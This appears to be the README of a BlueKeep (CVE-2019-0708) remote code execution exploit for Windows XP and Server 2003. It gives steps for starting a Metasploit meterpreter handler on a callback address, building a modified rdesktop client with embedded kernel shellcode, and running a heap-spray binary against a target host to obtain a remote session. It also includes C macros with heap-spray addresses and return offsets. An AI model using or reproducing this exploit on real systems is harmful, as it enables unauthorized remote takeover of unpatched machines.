cve-2019-0708_bluekeep_rce

  1. Run msfconsole with meterpreter/multi/handler listening on 192.168.116.133:6000
  2. cd rdesktop-1.5.0 && make
  3. Edit config to set the callback IP and port: 192.168.116.133 6000
  4. Run ./heap_spray 192.168.116.134 (.134 is the XP host's address; it must have at least 2 GB of RAM)
  5. The meterpreter handler in msfconsole receives a session

PS: shellcode/shellcode.asm is the kernel shellcode source. After it is assembled and converted to binary it becomes the file rdesktop-1.5.0\cf517d077e9c152120787eb6b251615b, which make compiles directly into the program.

Currently only XP is supported, and the XP host needs >= 2 GB of RAM.

To support 2003, the HEAP_SPRAY_ADDRESS macro in heap_spray.c has to be changed. Repeated testing showed that this address differs between 2003 system versions and between memory sizes. It can be used successfully on 2003 when testing your own machine, but it is not generic.

heap_spray.c:

```c
#ifdef _2003

#define HEAP_SPRAY_ADDRESS 0x953b09c0 // you need to find the address of the heap-sprayed shellcode yourself with windbg; if anyone finds a generic solution, please submit an issue

#define IcaChannelInputInternal_RET_OFFSET 0x268

#else

#define IcaChannelInputInternal_RET_OFFSET 0x274

#define HEAP_SPRAY_ADDRESS 0x88c969c0

#endif
```

Testing on 2003

  1. Run msfconsole with meterpreter/multi/handler listening on 192.168.116.133:6000
  2. cd rdesktop-1.5.0 && make
  3. Edit config to set the callback IP and port: 192.168.116.133 6000
  4. Run ./_2003_heap_spray 192.168.116.135 (.135 is the 2003 host's address; it must have at least 2 GB of RAM)
  5. The meterpreter handler in msfconsole receives a session
